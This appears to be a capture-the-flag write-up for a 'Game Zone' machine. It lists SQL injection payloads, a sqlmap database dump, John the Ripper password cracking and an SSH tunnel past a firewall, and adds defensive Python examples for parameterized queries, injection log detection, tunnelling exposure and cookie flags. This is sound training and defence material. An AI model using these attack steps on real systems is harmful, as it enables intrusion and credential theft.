Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!
Steps
- scan ports (nmap output below)
- try SQL injection in the input field:
    admin
    and' or 1=1 -- -
    ' or 1=1 -- -
- try a blank input too; capture the search request in Burp Suite
- save the request as a text file
- pass it into sqlmap:
    sqlmap -r <request.txt> --dbms=mysql --dump
- wait for the enumeration to finish and find the (hashed) passwords
- use John the Ripper (jtr) to crack the password:
    john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
- look at the sockets listening on the target:
    ss -tulpn
- port 10000 is blocked by the firewall
- use an SSH tunnel (local port forward) to expose the service:
    ssh -L 10000:localhost:10000 <username>@<ip>
- access the exposed service in a web browser:
    localhost:10000
- search for an exploit for the service
- append it to the URL
- append the file location

Port scan output:
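The injection step above works because user input is pasted straight into the SQL text. The following is an added example, not code from the original write-up or from the room's target: it shows the string-built query beside its parameterized fix, and a small access-log check for the payload shapes (`' or 1=1 -- -`) and the default sqlmap User-Agent that the steps leave behind. It assumes sqlite3 in place of the target's MySQL backend; the users row, the `/search` and `/login` paths and the log lines are constructed.

```python
# Added example (not code from the original write-up): the injection the steps above
# exploit, shown as a string-built query beside its parameterized fix, plus a small
# access-log check for the payload shapes and the sqlmap User-Agent those steps leave
# behind. Assumptions: sqlite3 stands in for the target's MySQL backend; the users
# row, log lines and the /search and /login paths are constructed for this example.
import re
import sqlite3
import urllib.parse


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """User input is concatenated into the SQL text, so quotes and -- rewrite the query."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Bound parameters: the driver passes the input as data, never as SQL syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Detection side: shapes of the payloads used above, matched after URL-decoding.
INJECTION_PATTERNS = {
    "quoted tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.IGNORECASE),
    "comment terminator": re.compile(r"--\s*-"),
    "sqlmap user-agent": re.compile(r"sqlmap", re.IGNORECASE),
}

# Constructed Apache-style access log lines.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /search?q=%27+or+1%3D1+--+- HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:30 +0000] "GET /search?q=test HTTP/1.1" 200 1024 "-" "sqlmap/1.4"',
]


def flag_request(line):
    """Names of the patterns that match one log line (URL-decoded first)."""
    decoded = urllib.parse.unquote_plus(line)
    return [name for name, pat in INJECTION_PATTERNS.items() if pat.search(decoded)]


def scan_log(lines):
    """(line number, matched pattern names) for every flagged line."""
    return [(i, flag_request(line)) for i, line in enumerate(lines, 1) if flag_request(line)]


if __name__ == "__main__":
    db = make_db()
    for user in ("' or 1=1 -- -", "and' or 1=1 -- -", "admin"):
        print(f"{user!r}: vulnerable={login_vulnerable(db, user, 'x')} safe={login_safe(db, user, 'x')}")
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

The parameterized version is the fix; the log check is only a cheap signal. A payload sent in a POST body (as the Burp-captured request above is) never appears in a standard access log, so body-level detection needs request logging such as a WAF audit log, and the sqlmap User-Agent match disappears as soon as the tool is run with a custom agent.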
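The port 10000 step shows why a firewall rule alone does not hide a service: anyone with an SSH login can reach a firewalled or loopback-bound port with `ssh -L`. The following added example (not from the original notes) parses `ss -tulpn`-style output to list the listeners that are reachable only from the host itself, and reads an sshd_config excerpt to report whether local TCP forwarding is allowed for such logins. The ss lines, the firewall allow-list and the sshd_config text are constructed.

```python
# Added example (not from the original notes): find listeners that the network
# firewall does not expose but that an SSH user can still reach with `ssh -L`, and
# check whether sshd permits that forwarding. The ss output, firewall allow-list and
# sshd_config excerpt below are constructed for this example.
import re

SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*         users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      128    *:80              *:*               users:(("apache2",pid=901,fd=4))
tcp   LISTEN 0      80     127.0.0.1:3306    0.0.0.0:*         users:(("mysqld",pid=850,fd=20))
tcp   LISTEN 0      128    *:10000           *:*               users:(("perl",pid=1104,fd=5))
"""

# Constructed: the ports the host firewall's INPUT chain accepts from the network.
FIREWALL_ALLOWED_PORTS = {22, 80}

SSHD_CONFIG = """\
# constructed sshd_config excerpt
Port 22
PermitRootLogin no
AllowTcpForwarding yes
"""


def parse_listeners(text):
    """Return (proto, bind address, port, process name) for each socket line."""
    listeners = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) < 5:
            continue
        proto, local = parts[0], parts[4]
        addr, _, port = local.rpartition(":")   # handles "[::]:22" as well
        match = re.search(r'"([^"]+)"', line)   # process name inside users:(("name",...))
        listeners.append((proto, addr, int(port), match.group(1) if match else "?"))
    return listeners


def hidden_services(listeners, allowed_ports):
    """Listeners the network cannot reach directly but a local or SSH user can."""
    hidden = []
    for _proto, addr, port, proc in listeners:
        loopback_only = addr in ("127.0.0.1", "[::1]", "localhost")
        if loopback_only or port not in allowed_ports:
            reason = "bound to loopback" if loopback_only else "blocked by firewall"
            hidden.append((port, proc, reason))
    return hidden


def local_forwarding_enabled(sshd_config):
    """True when sshd allows `ssh -L` (AllowTcpForwarding yes/all/local; OpenSSH defaults to yes)."""
    for line in sshd_config.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "allowtcpforwarding":
            return value.strip().lower() in ("yes", "all", "local")
    return True


if __name__ == "__main__":
    found = parse_listeners(SS_OUTPUT)
    for port, proc, reason in hidden_services(found, FIREWALL_ALLOWED_PORTS):
        print(f"port {port} ({proc}): {reason}, reachable via ssh -L")
    print("local forwarding allowed:", local_forwarding_enabled(SSHD_CONFIG))
```

Against the constructed input this reports 3306 (loopback) and 10000 (firewalled) as reachable through a tunnel, with forwarding enabled. The mitigation is on the SSH side as much as the firewall side: `AllowTcpForwarding no` (or a restrictive `PermitOpen`) in a `Match` block for accounts that have no business forwarding, and treating anything that listens on the host as exposed to every local login rather than as hidden.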
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
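The `http-cookie-flags` line in the scan above reports that the PHPSESSID cookie is set without HttpOnly, which leaves the session id readable by any script injected into the page. The following added example (not code from the original notes or from the target) performs the same check over the Set-Cookie headers of a raw HTTP response and lists the missing attributes; the response text is constructed and the session id is a placeholder.

```python
# Added example (not code from the original notes): the check behind nmap's
# http-cookie-flags finding above ("PHPSESSID: httponly flag not set"), run over the
# Set-Cookie headers of a raw HTTP response. The response is constructed and the
# session id value is a placeholder.
def audit_set_cookie(header_value, over_https=True):
    """Return the hardening attributes missing from one Set-Cookie header value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    attrs = {}
    for part in parts[1:]:                   # parts[0] is name=value
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    missing = []
    if "httponly" not in attrs:              # script-readable: session theft via XSS
        missing.append("HttpOnly")
    if over_https and "secure" not in attrs:  # would also be sent over plaintext HTTP
        missing.append("Secure")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):  # no CSRF limit
        missing.append("SameSite")
    return missing


def cookie_name(header_value):
    """The cookie name from a Set-Cookie header value."""
    return header_value.split(";", 1)[0].split("=", 1)[0].strip()


def audit_response(raw_response, over_https=True):
    """Map each cookie set by a raw HTTP response to its missing attributes."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    findings = {}
    for line in head.split("\r\n")[1:]:      # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            findings[cookie_name(value)] = audit_set_cookie(value.strip(), over_https)
    return findings


# Constructed response resembling what the scanned PHP app sends on port 80.
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "Set-Cookie: PHPSESSID=PLACEHOLDER_SESSION_ID; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><title>Game Zone</title></html>"
)

# What the same cookie looks like once the session settings are hardened.
HARDENED_COOKIE = "PHPSESSID=PLACEHOLDER_SESSION_ID; path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    print(audit_response(RESPONSE, over_https=False))   # plain HTTP, so Secure is not demanded
    print(audit_set_cookie(HARDENED_COOKIE))
```

For a PHP application the fix is configuration rather than code: `session.cookie_httponly = 1`, `session.cookie_secure = 1` (once the site is served over TLS) and `session.cookie_samesite = Lax` in php.ini produce the hardened header above. The `over_https` switch matters for this target because it serves plain HTTP on port 80, where a Secure flag would stop the cookie from being sent at all.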